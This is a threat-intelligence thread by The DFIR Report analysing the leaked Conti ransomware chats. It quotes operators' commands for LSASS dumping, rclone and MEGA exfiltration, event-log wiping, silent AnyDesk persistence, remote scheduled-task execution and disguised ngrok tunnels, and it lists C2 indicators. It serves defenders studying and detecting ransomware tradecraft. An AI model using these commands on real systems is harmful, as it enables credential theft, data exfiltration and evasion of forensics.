The DFIR Report Profile picture
Mar 1, 2022 78 tweets 55 min read Read on X
Here's a thread on some of the interesting things we've seen in the #ContiLeaks.

If you would like to read the chat logs and TrickBot Forum information, @Kostastsale has translated them to English here: github.com/tsale/translat…. He will be adding more as things get leaked.
New chat logs from the 26 Feb to the 28 Feb were released. It included an entertaining exchange where the user "pumba" was not happy with their work partner "tramp" (also referred to as “trump”). “Pumba” ends the conversation by asking to be moved to another team. #ContiLeaks Image
Leaked Bazar Bot panels show hundreds of past infected clients. Entries contain comments that include reconnaissance of revenue, and tracking work to be done. #ContiLeaks ImageImageImageImage
Additional infrastructure has been identified including the source code and configurations of many of their sites. Iptable rules and nginx configuration leak more IP addresses! Files contain Postgres passwords to their storage #ContiLeaks ImageImageImage
Can relate - #ImposeCost or infra problems? #ContiLeaks Image
Possible Conti v2 locker/decryptor. Folder is password protected. #ContiLeaks Image
Even threat actors use code control! GitLab Server IP and token. #ContiLeaks Image
Threat actors potentially talking about a developer who worked on Trickbot and Bazar. #ContiLeaks Image
Potentially more proof on Trickbot dying off. #ContiLeaks ImageImage
Threat actors talking about Zerologon on the Trickbot forum. Look familiar? thedfirreport.com/2022/02/21/qbo… thedfirreport.com/2021/11/01/fro… #ContiLeaks Image
Threat actors talking about Kerberoasting on the Trickbot forum #ContiLeaks Image
Decrypting Veeam secrets - we saw this in our Diavol case - thedfirreport.com/2021/12/13/dia… #ContiLeaks ImageImage
Discussing SonicWall SSL-VPN as initial access #ContiLeaks Image
"Fast Guide" - net, dclist, nltest, adfind, kerberoast, seatbelt, net-gpppassword, sharefinder, etc. #ContiLeaks Image
"I recommend using all the utilities attached in the c# topic by collecting them from the sources on the github.
" #ContiLeaks Image
"SMB Auto Brute Force" - Invoke-SMBAutoBrute.ps1

"We've ripped off two domain admins." #ContiLeaks ImageImageImage
"Tor backdoor" #ContiLeaks ImageImageImageImage
FileZilla discussion

"On networks where there are no DLP systems, you can simply download Filezilla portable and download all cartoons without ads!11
But you only need to use the SFTP protocol, that is, through port 22, not through 21" #ContiLeaks Image
Disabling Defender using GPO

"If you have only a defender in your network, then it is extinguished using the link above. It's right there in the pictures. Easier nowhere. Went to DC, created a policy
" #ContiLeaks Image
"Hyper V"

"it’s easier than with the sphere and proxmox, we fly into the virtuoso management manager, look in it where are the cars (Shares, AD) and compare with the list that was removed, if the entire infrastructure is on virtual machines, then just turn off..." #ContiLeaks Image
Disabling notifications on Synology servers before ransom #ContiLeaks Image
"Change RDP port" #ContiLeaks Image
"NTDS Dumping"

We reported on this technique multiple times - thedfirreport.com/?s=ac+i+ntds #ContiLeaks Image
Another method to steal a copy of ntds.dit using shadow copy, wmic, 7zip, and esentutl. #ContiLeaks Image
Don't know what to do on your next op? Just ask your team leader! #ContiLeaks Image
"Hunt Administrator"

"Of course, we are interested in seniors because they have more privileges/accesses (read passwords)."

net group "domain admins" /domain
AdFind

#ContiLeaks ImageImageImageImage
"Hunt Administrator Part 2"

"Firstly, how the software works - it asks where the user is at least somehow authorized at the moment. And our user is not simple - he is an administrator and at some point he can be authorized on 20-30-50 servers."

#ContiLeaks ImageImage
"Hunt Administrator Part 2"

"Also, system administrators FREQUENTLY meet the following folders in AppData\Roaming && AppData\Local:
Keepass
LastPass
their configs are there."

#ContiLeaks Image
"Hunt Administrator Part 2"

"Why the manual was written - so as not to try headlong to go raise the session and catch alerts from the admin.
Our job is rather to figure out what works, rather than setting up brute force for all kinds of access."

#ContiLeaks Image
"powerupsql"

powershell-import /home/user/soft/scripts/powerupsql.ps1
runas /netonly /user:domain.local\user powershell_ise

"From vpn it also works through (grabbing skl servers in the domain)"

#ContiLeaks Image
Threat actors having some issues with Cylance Protect

Difficulty raising session
Mount AnyDesk / Onion backdoor
Anchor DLL not attaching
Dump LSASS does not help (the output is empty)
Palit advanced ip scanner
Deleted via GUI + reboot

#ContiLeaks ImageImage
"TeamServer setup" #CobaltStrike

C2concealer being used by Conti TAs - Mentioned in a couple of our #CobaltStrike reports thedfirreport.com/2022/01/24/cob… thedfirreport.com/2021/08/29/cob…

#ContiLeaks ImageImageImage
"ShadowProtect SPX (StorageCraft)"

"Accessing a server with Shadow Protect SPX backups (StorageCraft)"

#ContiLeaks Image
"Useful Links and Websites"

#ContiLeaks Image
Kerberoasting using compromised VPN creds

#ContiLeaks Image
"Backup of all MS Exchange mailboxes in one command"

foreach ($mbx in (Get-Mailbox)){New-MailboxExportRequest -mailbox $mbx.alias -FilePath "\\Server\SharedFolder\$($mbx.Alias).pst"}

#ContiLeaks Image
"Rclone"

shell rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

"Everyone connects via SSH under their own account, configures the remote (if it is not already configured), creates.."

#ContiLeaks ImageImageImageImage
"Finding and uploading a webshell in Exchange Microsoft"

#ContiLeaks ImageImageImageImage
"Finding and uploading a webshell in Exchange Microsoft"

"The lightest and most durable webshell I use is this"

"For those who have asp webshell removed \ scorched by Aver! you can obfuscate not only the one in the archive, it removes detections.."

#ContiLeaks ImageImage
"Anydesk"

cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent

"And then we log in with a local admin or a domain account and use the charms of Anydesk
You can also download / upload to / from the victim's machine..."

#ContiLeaks Image
The #ContiLeaks account recently linked additional source code relating to Trickbot. It includes Erlang code and configuration files from supporting Trickbot infrastructure Image
"Install metasploit on vps"

#ContiLeaks Image
"HOW AND WHAT INFO TO DOWNLOAD"

"Next, we study the removed balls, we are interested in
*Finance docks
*Accounting
*Aichi
*Clients
*Projects
And so on, it all depends on what our target is doing"

#ContiLeaks Image
"RIGHT CLICK ON THE AGENT AND CLICK INTERACT"

Clicky clicky instructions for #CobaltStrike/Discovery

#ContiLeaks Image
Team descriptions, team leads, scheduling, etc.

#ContiLeaks Image
"MegaNZ usage"

MEGAclient.exe login supertest@mail.test P@$$w0rd
schtasks /query /FO list | findstr /i "mega"

#ContiLeaks Image
"IF RDP IN LOCAL IS VERY NEEDED :: HOW NOT TO SLEEP"

"Such simple tricks will help you not to sleep stupidly on the RDP"

"We do not sit on the RDP, after we have finished - we do Logoff (MANDATORY). Not to be confused with simply closing the RDP window. =)"

#ContiLeaks Image
"Starting a binary on a remote machine via SCHTASKS from Cobalt Strike"

shell SCHTASKS /s remote-hostname123 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\srvvhost.exe" /sc ONCE /sd 01/01/2021 /st 00: 00

#ContiLeaks Image
We always thought Conti was the rebrand for Ryuk, and info keeps rolling in:



#ContiLeaks
So...we are pretty good at what we do?

screenshot credits to:

#ContiLeaks Image
"megacmd"

shell MEGAclient.exe put -q --ignore-quota-warn \\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z /

#ContiLeaks Image
Executing the locker /w examples and parameters

"All parameters can be combined with each other, the order is not important. If the locker is launched through the command line, then run it as an administrator (If you have rights)."

#ContiLeaks Image
"Get-ADComputer"

(Get-ADComputer -Properties ipv4address, lastlogondate, operatingsystem -Filter {enabled -eq "true" -and OperatingSystem -Like '*Windows Server*'})

thedfirreport.com/?s=Get-ADCompu…

5x Bazar cases
1x Ryuk
1x Trickbot

#ContiLeaks
More Rclone chatter, appears they learned about the tool ~2021-04-07

"rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12"

"here is the guide. everything is simple here"

thedfirreport.com/?s=rclone

#ContiLeaks Image
#CobaltStrike

"The current version of cobalt is patched with a Java hook where a trial EICAR fingerprint was taken."

"there is an artifact.cna that needs to be imported into cobalt to generate internal native loads and staged loads to run."

#ContiLeaks Image
"Regulations for submitting a case and working with data"

"In the process of data retrieval and in the process of parsing, we are looking for files containing cyber insurance conditions, standard search tags

Cyber
policy
insurance
endorsement
supplementary..."

#ContiLeaks Image
TAs exploiting SonicWall SMA

#ContiLeaks Image
"Dumping Lsass without katz"

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP

cmd.exe > procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

#ContiLeaks Image
Lots of familiar tools in these dumps/conversations.

TA using Responder

#ContiLeaks Image
SharpHound/Bloodhound

"shoot the sharphound, throw the shot into the bloodhound - profit"

execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --exc...

#ContiLeaks Image
"Cleaning out the dens" aka deleting logs

1.CMD
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

2. PowerShell
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

#ContiLeaks ImageImage
TAs testing WinPwn by @ShitSecure and @GossiTheDog's HiveNightmaware

#ContiLeaks Image
@ShitSecure @GossiTheDog TAs talking about installing Windows Subsystem for Linux

"we need windows server 2019+"

#ContiLeaks Image
@ShitSecure @GossiTheDog Few references to SharpChromium so far

"SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:

Cookies
History
Saved Logins"

github.com/djhohnstein/Sh…

#ContiLeaks ImageImage
Impacket, proxychains, psexec

#ContiLeaks ImageImageImageImage
TAs testing/talking about PetitPotam by @topotam77

"I did this manu, suddenly it will help someone. bussink.net/ad-cs-exploit-…"

"Has anyone smoked this github.com/topotam/PetitP…"

#ContiLeaks ImageImage
@topotam77 Few conversations about using this #Zerologon exploit github.com/nccgroup/nccfs… by @NCCGroupInfosec:

"it's better to check with SharpZerologon, it's more reliable"

#ContiLeaks ImageImage
It seems the TAs had a common set of exploits they usually tried including:

eternalblue ms17-010
bluekeep CVE- 2019-0708
smbghost cve-2020-0796

#ContiLeaks ImageImageImageImage
winPEAS by @carlospolopm getting a few call outs.

Also mentions of seatbelt, inveigh by @kevin_robertson and rebeus.

"Run ad_find, seatBelt, ChromeSharp, winpeas, rebeus, Inveit, tried every possible exploit."

#ContiLeaks ImageImageImageImage
Step by step instructions by "tl1"

1. Collect domain and the environment info
2. Collect AD info
3. seatbelt, WinPEAS, GPP, ShareFinder, Kerberoast, asreproast, zerologon
4. Persistence during ShareFinder exec
5. Lateral movement if possible

#ContiLeaks ImageImageImageImage
sqlcmd

"see who is working with the database (hosts and users from where they connected to it)"

shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses"

shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W

#ContiLeaks Image
A couple mentions of SessionGopher by @arvanaghi

"it turned out that no one listens to me so I say it again to all who have eyes and ears use session gopher domain-width before locking"

h/t to @seadev3 for pointing that out ImageImage
"NGROK v2 (only official solution)"

Rename-Item -Path "C:\Windows\tmp\ngrok.exe" -NewName "sysmon.exe"

.\nssm.exe install sysmon C:\Windows\tmp\sysmon.exe start --all --region us --config "C:\Windows\tmp\config.yml" --log "false"

#ContiLeaks ImageImage
"Stops everything that is possible. VERY useful when locking when you need to lock servers nearby that are busy with DBs and other applications."

If you're detecting the below commands, its too late. Try to detect earlier in the attack lifecycle.

#ContiLeaks ImageImageImage
All for now!

Shout out to @svch0st for helping!
Shout out to @Kostastsale for translating the leaks!
Shout out to @ContiLeaks for providing the leaks!

#ContiLeaks

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with The DFIR Report

The DFIR Report Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @TheDFIRReport

Nov 14, 2022
BumbleBee Zeros in on Meterpreter

➡️Initial Access: Contact Forms/Stolen Images/ISO
➡️PrivEsc: WSReset & Slui UAC Bypass, Zerologon CVE2020-1472
➡️Cred Access: Procdump LSASS, reg dump SAM/SEC/SYS hives
➡️C2: BumbleBee, Meterpreter, CobaltStrike

thedfirreport.com/2022/11/14/bum…

1/X
Analysis and reporting completed by @0xtornado, @samaritan_o, @RoxpinTeddy.

Shout outs to @MsftSecIntel, @threatinsight, @malpedia, @TheRecord_Media, @campuscodi
Thanks for all you do!!

2/X
IOC's (Case from May 2022)

➡️BumbleBee

StolenImages_Evidence.iso
759688d1245aacd0ed067b0f0388786e911aaf28

documents.lnk
38eef0cdaa8faa27c9e2cedeafcfe842e2e0e08e

mkl2n.dll
fa3649b0472ba7fd9b31a22c904b2de4c008f540

C2:
45.153.243[.]93:443
213.232.235[.]199:443

3/X
Read 5 tweets
Oct 31, 2022
Follina Exploit Leads to Domain Compromise

➡️Initial Access: Word Doc exploiting Follina
➡️Persistence: Scheduled Tasks
➡️Discovery: ADFind, Netscan, etc.
➡️Lat Movement: SMB, Service Creation, RDP
➡️C2: #CobaltStrike, Qbot, NetSupport, Atera/Splashtop

thedfirreport.com/2022/10/31/fol…
Analysis and reporting completed by @pigerlin, @yatinwad and @_pete_0.

Shout outs to @CISAgov, @GossiTheDog, @msftsecresponse, @malware_traffic and @sans_isc.
IOC's for intrusion, dated June 2022

Maldoc:
doc532.docx
03ef0e06d678a07f0413d95f0deb8968190e4f6b

Qbot Dll:
liidfxngjotktx.dll
dab316b8973ecc9a1893061b649443f5358b0e64

Netsupport Client
client32.exe
3112a39aad950045d6422fb2abe98bed05931e6c
Read 5 tweets
Aug 8, 2022
BumbleBee Roasts Its Way to Domain Admin

➡️Initial Access: BumbleBee (zipped ISO /w LNK+DLL)
➡️Persistence: AnyDesk
➡️Discovery: VulnRecon, Seatbelt, AdFind, etc.
➡️Credentials: Kerberoast, comsvcs.dll, ProcDump
➡️C2: BumbleBee, CobaltStrike, AnyDesk

thedfirreport.com/2022/08/08/bum…
Analysis and reporting completed by @Tornado and @MetallicHack

Shout outs: @threatinsight, Google's Threat Analysis Group, @vladhiewsha, @benoitsevens, @DidierStevens, @malpedia, @k3dg3, @malware_traffic, @Unit42_Intel, @EricRZimmerman, & @svch0st. Thanks ya'll!
IOC's

#Bumblebee
BC_invoice_Report_CORP_46.zip
6c87ca630c294773ab760d88587667f26e0213a3
142.91.3[.]109:443
45.140.146[.]30:443

#CobaltStrike
fuvataren[.]com
45.153.243[.]142:443

dofixifa[.]co
108.62.12[.]174:443

CS Payload Hosting
hxxp://104.243.33.50:80/a
Read 6 tweets
Aug 5, 2021
This content looks VERY familiar...



1. "Initial Actions"
2. rclone config using Mega
3. rclone instructions
4.Powerview/UserHunter instructions

Thanks @vxunderground!!
1. NTDS dumping
2. Kerberoasting
3. Netscan (Thanks Perry)
4. Ping script
1. Dump LSASS via #CobaltStrike, RDP, Mimikatz
2. AnyDesk install/exec
3. Scheduled task and wmic exec
4. AdFind! The same script we've been seeing since 2019
Read 9 tweets
Jul 8, 2021
Here's some newer #CobaltStrike servers we're tracking:

scripts[.]arshmedicalfoundation[.]com
3.142.144[.]90:443

servers[.]indiabullamc[.]com
139.180.214[.]187:80

rce[.]accountrecovery[.]co[.]uk
134.209.118[.]184:80

Full list available @ thedfirreport.com/services
#AllIntel
Here's some newer #CobaltStrike servers we're tracking:

azurecloud[.]dynssl[.]com
136.244.113[.]93:443

securesoftme[.]azureedge[.]net
162.244.80[.]181:80|443

www[.]msclientweb[.]com
147.182.175[.]159:443

Full list available @ thedfirreport.com/services
#AllIntel
Here's some newer #CobaltStrike servers we're tracking:

macrodown[.]azureedge[.]net
85.93.88[.]165:80

taobao[.]alibaba-cn[.]ga
155.94.163[.]56:80

upload[.]dwi22g[.]com
185.244.150[.]52:443

Full list available @ thedfirreport.com/services
#AllIntel
Read 4 tweets
Mar 29, 2021
Sodinokibi (aka REvil) Ransomware

➡️TTR: 4 hours
➡️Initial Access: IcedID
➡️Discovery: nltest, net, wmic, AdFind, BloodHound, etc.
➡️PrivEsc: UAC-TokenMagic & Invoke-SluiBypass
➡️Defense Evasion: Safe Mode & new GPO
➡️Exfil: Rclone
➡️C2: CobaltStrike

thedfirreport.com/2021/03/28/sod… ImageImageImageImage
Shout-out to @hatching_io, @lazyactivist192, @malwrhunterteam, and @R3MRUM. Thanks for doing what you do!

IOCs, ransomware files, PCAPs, logs, memory captures, etc. available @ thedfirreport.com/services Image
🔥C2🔥:

CobaltStrike:
smalleststores[.]com
cloudmetric[.]online
45.86.163[.]78:80
45.86.163[.]78:443
195.189.99[.]74:8080
195.189.99[.]74:80
45.86.163[.]78:8080

IcedID:
nomovee[.]website
cikawemoret34[.]space
161.35.109[.]168:443
206.189.10[.]247:80
Read 4 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

:(